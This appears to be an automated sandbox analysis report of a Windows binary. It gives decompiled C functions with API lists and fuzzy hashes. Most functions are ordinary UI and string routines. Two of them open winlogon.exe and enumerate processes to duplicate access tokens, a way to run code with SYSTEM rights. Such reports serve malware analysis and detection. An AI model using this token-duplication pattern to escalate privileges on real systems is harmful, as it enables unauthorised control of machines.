                                                                                                                • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                				struct HDWP__* _v8;
                                                                                                                				intOrPtr* _v12;
                                                                                                                				void _v534;
                                                                                                                				short _v536;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t42;
                                                                                                                				intOrPtr* _t95;
                                                                                                                				RECT* _t96;
                                                                                                                
                                                                                                                				_t95 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_a4 == 0x233) {
                                                                                                                					_v536 = 0;
                                                                                                                					memset( &_v534, 0, 0x208);
                                                                                                                					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                                                					DragFinish(_a8);
                                                                                                                					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                                                					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                                                					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                                                					_t95 = _v12;
                                                                                                                				}
                                                                                                                				if(_a4 != 5) {
                                                                                                                					if(_a4 != 0xf) {
                                                                                                                						if(_a4 == 0x24) {
                                                                                                                							_t42 = _a12;
                                                                                                                							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                                                							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						E00402EC8(_t95 + 0x40);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v8 = BeginDeferWindowPos(0xd);
                                                                                                                					_t96 = _t95 + 0x40;
                                                                                                                					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                                                					EndDeferWindowPos(_v8);
                                                                                                                					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                                                					_t95 = _v12;
                                                                                                                				}
                                                                                                                				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040421E
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2142561256-3993045852
                                                                                                                • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00405B81(signed short __ebx) {
                                                                                                                				signed int _t21;
                                                                                                                				void* _t22;
                                                                                                                				struct HINSTANCE__* _t25;
                                                                                                                				signed int _t27;
                                                                                                                				void* _t35;
                                                                                                                				signed short _t39;
                                                                                                                				signed int _t40;
                                                                                                                				void* _t57;
                                                                                                                				int _t61;
                                                                                                                				void* _t62;
                                                                                                                				int _t71;
                                                                                                                
                                                                                                                				_t39 = __ebx;
                                                                                                                				if( *0x41c470 == 0) {
                                                                                                                					E00405ADF();
                                                                                                                				}
                                                                                                                				_t40 =  *0x41c468;
                                                                                                                				_t21 = 0;
                                                                                                                				if(_t40 <= 0) {
                                                                                                                					L5:
                                                                                                                					_t57 = 0;
                                                                                                                				} else {
                                                                                                                					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                                                                						_t21 = _t21 + 1;
                                                                                                                						if(_t21 < _t40) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                                                				}
                                                                                                                				L6:
                                                                                                                				if(_t57 != 0) {
                                                                                                                					L21:
                                                                                                                					_t22 = _t57;
                                                                                                                				} else {
                                                                                                                					if((_t39 & 0x00010000) == 0) {
                                                                                                                						if( *0x40fb90 == 0) {
                                                                                                                							_push( *0x41c478 - 1);
                                                                                                                							_push( *0x41c45c);
                                                                                                                							_push(_t39);
                                                                                                                							_t25 = E00405CE7();
                                                                                                                							goto L15;
                                                                                                                						} else {
                                                                                                                							wcscpy(0x40fda0, L"strings");
                                                                                                                							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                                                							_t62 = _t62 + 0x10;
                                                                                                                							if(_t35 == 0) {
                                                                                                                								L13:
                                                                                                                								_t25 = GetModuleHandleW(0);
                                                                                                                								_push( *0x41c478 - 1);
                                                                                                                								_push( *0x41c45c);
                                                                                                                								_push(_t39);
                                                                                                                								goto L15;
                                                                                                                							} else {
                                                                                                                								_t61 = wcslen( *0x41c45c);
                                                                                                                								if(_t61 == 0) {
                                                                                                                									goto L13;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t25 = GetModuleHandleW(_t57);
                                                                                                                						_push( *0x41c478 - 1);
                                                                                                                						_push( *0x41c45c);
                                                                                                                						_push(_t39 & 0x0000ffff);
                                                                                                                						L15:
                                                                                                                						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                                						_t71 = _t61;
                                                                                                                					}
                                                                                                                					if(_t71 <= 0) {
                                                                                                                						L20:
                                                                                                                						_t22 = 0x40c4e8;
                                                                                                                					} else {
                                                                                                                						_t27 =  *0x41c46c;
                                                                                                                						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							_t57 =  *0x41c458 + _t27 * 2;
                                                                                                                							_t14 = _t61 + 2; // 0x2
                                                                                                                							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                                                                							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                                                							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                                                							 *0x41c468 =  *0x41c468 + 1;
                                                                                                                							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                                                							if(_t57 != 0) {
                                                                                                                								goto L21;
                                                                                                                							} else {
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t22;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                • wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                  • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                • wcslen.MSVCRT ref: 00405C20
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                • memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                                                				char _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* _t18;
                                                                                                                				intOrPtr* _t22;
                                                                                                                				void* _t23;
                                                                                                                				void* _t28;
                                                                                                                				int _t37;
                                                                                                                				intOrPtr* _t39;
                                                                                                                				intOrPtr* _t40;
                                                                                                                
                                                                                                                				_v8 = 0;
                                                                                                                				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                                                				_v12 = _t18;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					_t37 = GetLastError();
                                                                                                                				} else {
                                                                                                                					_t39 = _a4 + 0x800;
                                                                                                                					_a8 = 0;
                                                                                                                					E0040289F(_t39);
                                                                                                                					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                                                					if(_t22 == 0) {
                                                                                                                						_t23 = 0;
                                                                                                                					} else {
                                                                                                                						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                                                					}
                                                                                                                					if(_t23 == 0) {
                                                                                                                						_t37 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_a4 = _a8;
                                                                                                                						E0040289F(_t39);
                                                                                                                						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                                                						if(_t40 == 0) {
                                                                                                                							_t28 = 0;
                                                                                                                						} else {
                                                                                                                							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                                                						}
                                                                                                                						if(_t28 == 0) {
                                                                                                                							_t37 = GetLastError();
                                                                                                                						} else {
                                                                                                                							 *_a12 = _v8;
                                                                                                                							_t37 = 0;
                                                                                                                						}
                                                                                                                						CloseHandle(_a8);
                                                                                                                					}
                                                                                                                					CloseHandle(_v12);
                                                                                                                				}
                                                                                                                				return _t37;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                  • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                • String ID: winlogon.exe
                                                                                                                • API String ID: 1315556178-961692650
                                                                                                                • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				char _v12;
                                                                                                                				void _v2058;
                                                                                                                				void _v2060;
                                                                                                                				int _t35;
                                                                                                                				int _t41;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                				signed short* _t50;
                                                                                                                				void** _t52;
                                                                                                                				void* _t53;
                                                                                                                				void* _t54;
                                                                                                                
                                                                                                                				_t48 = 0;
                                                                                                                				_v2060 = 0;
                                                                                                                				memset( &_v2058, 0, 0x7fe);
                                                                                                                				_t54 = _t53 + 0xc;
                                                                                                                				 *__ebx = 0;
                                                                                                                				_t52 = _a4 + 4;
                                                                                                                				_v12 = 2;
                                                                                                                				do {
                                                                                                                					_push( *_t52);
                                                                                                                					_t6 = _t52 - 4; // 0xe80040cb
                                                                                                                					_push( *_t6);
                                                                                                                					_push(L"%s (%s)");
                                                                                                                					_push(0x400);
                                                                                                                					_push( &_v2060);
                                                                                                                					L0040B1EC();
                                                                                                                					_t35 = wcslen( &_v2060);
                                                                                                                					_v8 = _t35;
                                                                                                                					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                                                					_t49 = _t48 + _v8 + 1;
                                                                                                                					_t41 = wcslen( *_t52);
                                                                                                                					_v8 = _t41;
                                                                                                                					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                                					_t54 = _t54 + 0x34;
                                                                                                                					_t52 =  &(_t52[2]);
                                                                                                                					_t23 =  &_v12;
                                                                                                                					 *_t23 = _v12 - 1;
                                                                                                                					_t48 = _t49 + _v8 + 1;
                                                                                                                				} while ( *_t23 != 0);
                                                                                                                				_t50 = __ebx + _t48 * 2;
                                                                                                                				 *_t50 =  *_t50 & 0x00000000;
                                                                                                                				_t50[1] = _t50[1] & 0x00000000;
                                                                                                                				return __ebx;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3979103747-1363028141
                                                                                                                • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				void _v514;
                                                                                                                				short _v516;
                                                                                                                				void _v8710;
                                                                                                                				short _v8712;
                                                                                                                				int _t17;
                                                                                                                				WCHAR* _t26;
                                                                                                                
                                                                                                                				E0040B550(0x2204, __ecx);
                                                                                                                				_v8712 = 0;
                                                                                                                				memset( &_v8710, 0, 0x2000);
                                                                                                                				_t17 = GetDlgCtrlID(_a4);
                                                                                                                				_t34 = _t17;
                                                                                                                				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                                				if(_t17 > 0 && _v8712 != 0) {
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v514, 0, 0x1fe);
                                                                                                                					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                					_t26 =  &_v516;
                                                                                                                					_push(L"sysdatetimepick32");
                                                                                                                					_push(_t26);
                                                                                                                					L0040B278();
                                                                                                                					if(_t26 != 0) {
                                                                                                                						E00406025(_t34,  &_v8712);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00404706(long __edi, wchar_t* _a4) {
                                                                                                                				short _v8;
                                                                                                                				void* _t8;
                                                                                                                				void* _t10;
                                                                                                                				long _t14;
                                                                                                                				long _t24;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t8 = 0;
                                                                                                                				_t14 = 0x1100;
                                                                                                                				if(__edi - 0x834 <= 0x383) {
                                                                                                                					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                                					if(0 != 0) {
                                                                                                                						_t14 = 0x1900;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                                					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                                                				} else {
                                                                                                                					if(wcslen(_v8) < 0x400) {
                                                                                                                						wcscpy(_a4, _v8);
                                                                                                                					}
                                                                                                                					_t10 = LocalFree(_v8);
                                                                                                                				}
                                                                                                                				return _t10;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                • wcslen.MSVCRT ref: 00404756
                                                                                                                • wcscpy.MSVCRT ref: 00404766
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                • wcscpy.MSVCRT ref: 00404780
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: netmsg.dll
                                                                                                                • API String ID: 2767993716-3706735626
                                                                                                                • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v32;
                                                                                                                				char _v72;
                                                                                                                				void _v582;
                                                                                                                				long _v584;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t27;
                                                                                                                				wchar_t* _t34;
                                                                                                                				wchar_t* _t42;
                                                                                                                				long* _t43;
                                                                                                                				int _t44;
                                                                                                                				void* _t52;
                                                                                                                				void* _t54;
                                                                                                                				long _t56;
                                                                                                                				long* _t57;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t60 = __eflags;
                                                                                                                				_t52 = __edx;
                                                                                                                				E004095AB( &_v72);
                                                                                                                				_v584 = 0;
                                                                                                                				memset( &_v582, 0, 0x1fe);
                                                                                                                				E004095FD(_t52, _t60,  &_v72);
                                                                                                                				_t27 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				if(_v20 <= 0) {
                                                                                                                					L10:
                                                                                                                					_t56 = 0;
                                                                                                                				} else {
                                                                                                                					do {
                                                                                                                						_t57 = E00405A92(_t27,  &_v32);
                                                                                                                						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                                                							goto L9;
                                                                                                                						} else {
                                                                                                                							_t34 =  &_v584;
                                                                                                                							_push(_t34);
                                                                                                                							_push(_a4);
                                                                                                                							L0040B278();
                                                                                                                							if(_t34 == 0) {
                                                                                                                								L5:
                                                                                                                								_t44 = 0;
                                                                                                                								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                                                								if(_t54 == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_v16 = _v16 & 0;
                                                                                                                									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                                                										_t44 = 1;
                                                                                                                										CloseHandle(_v16);
                                                                                                                									}
                                                                                                                									CloseHandle(_t54);
                                                                                                                									if(_t44 != 0) {
                                                                                                                										_t56 =  *_t57;
                                                                                                                									} else {
                                                                                                                										goto L9;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t42 = wcschr( &_v584, 0x5c);
                                                                                                                								if(_t42 == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_t43 =  &(_t42[0]);
                                                                                                                									_push(_t43);
                                                                                                                									_push(_a4);
                                                                                                                									L0040B278();
                                                                                                                									if(_t43 != 0) {
                                                                                                                										goto L9;
                                                                                                                									} else {
                                                                                                                										goto L5;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                						L9:
                                                                                                                						_t27 = _v12 + 1;
                                                                                                                						_v12 = _t27;
                                                                                                                					} while (_t27 < _v20);
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				L12:
                                                                                                                				E004095DA( &_v72);
                                                                                                                				return _t56;
                                                                                                                			}





















                                                                                                                0x00405a19
                                                                                                                0x00405a1c
                                                                                                                0x00405a1d
                                                                                                                0x00405a20
                                                                                                                0x00405a29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a29
                                                                                                                0x00405a17
                                                                                                                0x00405a03
                                                                                                                0x00000000
                                                                                                                0x00405a6b
                                                                                                                0x00405a6e
                                                                                                                0x00405a72
                                                                                                                0x00405a72
                                                                                                                0x00000000
                                                                                                                0x004059d4
                                                                                                                0x00405a81
                                                                                                                0x00405a84
                                                                                                                0x00405a8f

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                  • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                  • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                  • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                  • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
